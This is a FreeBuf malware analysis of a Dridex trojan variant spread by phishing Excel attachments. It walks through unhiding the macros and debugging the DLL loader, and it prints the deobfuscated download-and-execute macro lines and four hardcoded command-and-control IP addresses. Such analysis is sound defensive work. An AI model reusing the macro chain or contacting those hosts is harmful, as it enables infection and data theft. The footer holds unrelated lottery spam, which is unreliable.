freeBuf
主站

分類

漏洞 工具 極客 Web安全 系統安全 網絡安全 無線安全 設備/客戶端安全 數據安全 安全管理 企業安全 工控安全

特色

頭條 人物志 活動 視頻 觀點 招聘 報告 資訊 區塊鏈安全 標準與合規 容器安全 公開課

官方公眾號企業安全新浪微博

FreeBuf.COM網絡安全行業門戶,每日發布專業的安全資訊、技術剖析。

FreeBuf+小程序

FreeBuf+小程序

Dridex木馬新變種來襲,小心來歷不明的郵件!
2020-09-17 11:55:19

背景概述

網絡安全宣傳的時候經常都會強調不要隨意打開來歷不明的郵件或者文件,這又是為什么呢?

因為很多時候一些木馬病毒的入侵就是通過釣魚郵件來進行的,深信服安全團隊近期捕獲的Dridex木馬病毒新變種就是通過這種入侵方式來入侵受害者系統并竊取信息。

Dridex是目前全球活躍且技術比較先進的銀行木馬之一,其又被稱為BUGAT和Cridex,主要目的是從受感染機器的用戶那里竊取網上銀行和系統信息,進行欺詐性交易,該病毒樣本會安裝鍵盤偵聽器并執行注入攻擊。

Dridex的目標用戶是Windows用戶,通過誘導用戶打開釣魚郵件附件中的Excel文檔,導致宏激活并下載Dridex,從而感染計算機并竊取用戶信息。

樣本信息

病毒名Dridex Trojan Variant
MD536d6caa7639fa761ec5408b1cdc8cad7
SHA256519312A969094294202A2EBE197BB4C563BA506FFFBD45000F0F9CC2923695CE
樣本類型Microsoft Excel 2007+
惡意類型

Dridex

入侵流程圖:

詳細分析

這個樣本主要通過釣魚的方式,偽裝成帶有偽造文件的Excel電子郵件,如果雙擊附件,Microsoft Office Excel會打開它;

查看我們的文件需要去打開宏,但是宏可用于加載其他惡意程序,所以對于一個未知的excel文檔來講,啟用宏和打開未知的exe文件一樣危險。

如果這個excel含有vba代碼:

1、可以點擊All-Open and pay 來執行惡意的VBA代碼;

2、點擊事件的按鈕,來觸發布局事件(Layout);

查看一下VBA代碼:

發現會彈出警告的消息,VBA被隱藏了,可以嘗試用EvilClippy去除隱藏屬性,安裝相應的組件mono。

*EvilClippy介紹:EvilClippy的開源工具,EvilClippy是一款專用于創建惡意MS Office測試文檔的跨平臺安全工具,它可以隱藏VBA宏和VBA代碼,并且可以對宏代碼進行混淆處理以增加宏分析工具的分析難度。當前版本的EvilClippy支持在Linux、macOS和Windows平臺上運行,實現了跨平臺特性。

解除保護:

EvilClippy.exe -uu macrofile.doc

直接解除保護查看:

直接可以看到相應的代碼:

可以大概知道A720-A1008有編碼的URL列表,由于字體顏色是白色的,可以調整一下便于查看;

直接調試vbs代碼:

發現解碼IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(TRUE)),

繼續下斷調試;

CALL("Kernel32","CreateDirectoryA","JCJ","C:\;",0)

CALL("Kernel32","CreateDirectoryA","JCJ","C:\;'",0)

CALL("URLMON","URLDownloadToFileA", "JJCCJJ",0,"X","C:\;'$.",0,0)

CALL("Shell32","ShellExecuteA", "JJCCCCJ",0,"Open","regsvr**"," -s C:\;'$.",0,0)

整理一下:

IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(TRUE))
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;",0)
CALL("Kernel32","CreateDirectoryA","JCJ","C:\;\'",0)
CALL("URLMON","URLDownloadToFileA", "JJCCJJ",0,"X","C:\;\'\$.",0,0)
CALL("Shell32","ShellExecuteA", "JJCCCCJ",0,"Open","regsvr**"," -s C:\;\'\$.",0,0)

在URLDownloadToFileA開始下載東西;

以上的過程是將隨意的URL下載到本地的文件中去,文件名字隨機,記錄一下這幾個網站然后去比較一下下載的dll文件MD5值,發現這幾個文件的MD5值是一樣的。

可以看到變量是我們看到的文件夾,路徑 C:\cEACqJVb\D6dpWrT\26bKqTf

最后可以看到使用一個命令 -s regsvr**下載文件,直接cmd process查看一下進程;

查看process tree 可以知道利用了execl去作為Dridex下載器,病毒直接調用了dridex中的一個方法,regsvr**為了能夠索引到xxx.dll后創建組件,調用了函數DllEntryPoint完成組件的注冊。

我們可以看到下載的文件也是一個dll的格式,符合上面的regsvr,嘗試直接用od附加進行調試DLL,查看一下導出函數;

或者也可以直接用OD中的插件loaddll 直接調試。

直接bp LoadLibraryExW 找到那個dll文件(如果不知道斷那個LoadLibrary可以ExW ExA A W都下斷,f9進行分析);

參數這里寫我們的dll位置,定位查看;

直接定位到位置后下斷點,重新執行到該斷點的位置,

可以直接停在這里分析,類似一個解壓縮的過程,最后的地址加載到EAX中,進行跳轉;

執行后,解密提取PE文件到可執行內存空間,類似于正常PE的拉伸的一個過程;

發現以下可疑點:

正常來說恢復現場應該是pop,但是這里用了push edx 加上 retn = jmp edx,相當于調用了Dridex核心的部分;

每一個dll文件都會提供一個導出功能,這里regsvr**調用了GetProcAddress從Dridex中獲取了export:DllRegisterServer,主要查找導出函數的地址,幾乎所有的惡意操作都在DllRegisterServer中,相當于執行了惡意操作的主函數main;

在這個DllRegisterServer函數中,Dridex從終端獲取信息,發送到一個服務器,它獲取自身電腦的用戶名和完整的計算機名,然后從注冊表中讀取Windows安裝時間,將獲取的信息放在一起,加密成MD5。

數據長度+計算機名稱+ MD5值,他會獲取我們計算機注冊表中,所有已安裝的軟件注冊表信息。

例如經常玩的wegame:

用的一些工具wireshark:

*Roaming文件夾是用于存放一些使用程序后產生的數據文件。

將收集到的信息傳送到一個服務器上;

以下四個地址是硬編碼寫入的,用來發送收集到的終端數據資料。

31 39 39 2E 36 36 2E 39 30 2E 36 33 3A 34 34 33 ?199.66.90.63:443
35 31 2E 36 38 2E 32 32 34 2E 32 34 35 3A 34 36 ?51.68.224.245:46
38 35 2E 32 31 34 2E 32 36 2E 37 3A 33 33 38 39 ?85.214.26.7:3389
31 30 37 2E 31 37 35 2E 38 37 2E 31 35 30 3A 33 38 38 39 ?107.175.87.150:3889

總結

該惡意程序通過垃圾郵件進行分發,會對銀行以及公司造成很嚴重的后果,雖然Dridex病毒很久沒有大量出現,但是一旦感染,會導致計算機內大量的數據泄漏,所以我們也要去做好相應的防范措施,避免這種事情的發生。

本文作者:, 轉載請注明來自FreeBuf.COM

# 木馬
被以下專輯收錄,發現更多精彩內容
+ 收入我的專輯
評論 按時間排序

登錄/注冊后在FreeBuf發布內容哦

相關推薦
  • 0 文章數
  • 0 評論數
  • 0 關注者
登錄 / 注冊后在FreeBuf發布內容哦
收入專輯
777766香港开奖结果 小说 北京十一选五中奖号 管家婆2020年资料免费公开 黑龙江11选5分析 pk10技巧 图解 体彩排列7怎么才中奖 北京11选五一定牛一 双色球胆拖投注计算器 湖北十一选五任选走势图 新华制药股票 甘肃快3历史查询结果